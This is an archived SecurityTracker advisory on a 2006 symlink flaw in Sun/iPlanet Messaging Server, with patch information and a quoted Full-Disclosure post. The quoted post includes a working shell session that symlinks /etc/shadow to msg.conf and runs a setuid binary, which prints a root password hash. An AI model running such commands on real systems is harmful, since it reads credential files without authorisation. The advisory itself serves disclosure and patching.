SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   Sun ONE/iPlanet Messaging Server Vendors:   Sun
Sun ONE/iPlanet Messaging Server 'msg.conf' Symlink Flaw Lets Local Users View Files
SecurityTracker Alert ID:  1016312
SecurityTracker URL:  http://securitytracker.com/id/1016312
CVE Reference:   CVE-2006-3159   (Links to External Site)
Updated:  Sep 13 2006
Original Entry Date:  Jun 15 2006
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Sun Java System Messaging Server 6.0, 6.1, and 6.2, iPlanet Messaging Server 5.2
Description:   A vulnerability was reported in Sun ONE/iPlanet Messaging Server. A local user can view portions of files on the target system.

A local user can set the CONFIGROOT environment variable to cause the server to read the configuration file from the 'msg.conf' file in the specified directory. A local user can create a symbolic link (symlink) from an arbitrary file to the configuration file. Then, the local user can invoke '/iplanet/iMS5/bin/msg/imta/bin/pipe_master' to view the first line of the symlinked file with root privileges.

php0t / zorro.hu reported this vulnerability.

Impact:   A local user can view portions of arbitrary files on the target system.
Solution:   Sun has issued the following fix.

SPARC Platform

* iPlanet Messaging Server 5.2 (for Solaris 8 and 9) with patch 5.2hf2.14 or later

The following T-Patches are also available:

SPARC Platform

* Sun Java System Messaging Server 6.0, 6.1, and 6.2 T-Patch T118207-57 (for Solaris 8, 9, and 10)

x86 Platform

* Sun Java System Messaging Server 6.0, 6.1, and 6.2 T-Patch T118208-57 (for Solaris 8, 9, and 10)

Linux Platform

* Sun Java Messaging Server 6.0, 6.1, and 6.2 T-Patch T118209-57 (for RHEL 2.1 and 3.0)

The Sun advisory is available at:

http://sunsolve.sun.com/search/document.do?assetkey=1-26-102496-1

Vendor URL:  sunsolve.sun.com/search/document.do?assetkey=1-26-102496-1 (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Solaris - SunOS)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Sun iPlanet Messaging Server 5.2 root password

Summary
----------------
Date: 14 Jun 2006
Vendor: Sun Microsystems, Inc.
Name: iPlanet Messaging Server
Version: 5.2 HotFix 1.16 (built May 14 2003)
Vuln: msg.conf symlink attack
Severity: high


Software description
----------------
The iPlanet Messaging Server is a software product that provides a
centralized location for the exchange of information through the sending
and receiving of messages. The product is designed for
telecommunications providers, service providers, and enterprises that
offer messaging capabilities to employees, partners, and customers. The
iPlanet Messaging Server delivers a Web-based messaging platform capable
of serving tens of millions of users, and also provides value-added
differentiated services, including outsourcing, wireless ,and unified
messaging services.

  
Vulnerability desciption
----------------
Setuid programs part of the iPlanet Messaging Server try to read the
configuration file msg.conf.
If the environment variable CONFIGROOT is set, the configuration is read
from that directory.
A symlink attack is possible, and as a result it is possible to read the
first line of any file with uid=0.


Example
----------------
test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version
iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003)
SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R
Solaris
test@sunbox:/tmp$ 
test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master
-rws--s--x    1 root     mail       446864 Sep 22  2005
/iplanet/iMS5/bin/msg/imta/bin/pipe_master
test@sunbox:/tmp$ 
test@sunbox:/tmp$ ln -s /etc/shadow msg.conf
test@sunbox:/tmp$ 
test@sunbox:/tmp$ export CONFIGROOT=.
test@sunbox:/tmp$ 
test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master
[14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error:
func=_configdrv_file_readoption; error=option name should be followed by
'='; line=root:qW1HFEa1MCD0w:11821::::::
ERROR: Configuration database initialization failed - see default
logfile
test@sunbox:/tmp$ 


Vulnerable
----------------
iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)

php0t / zorro.hu
www.zorro.hu


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC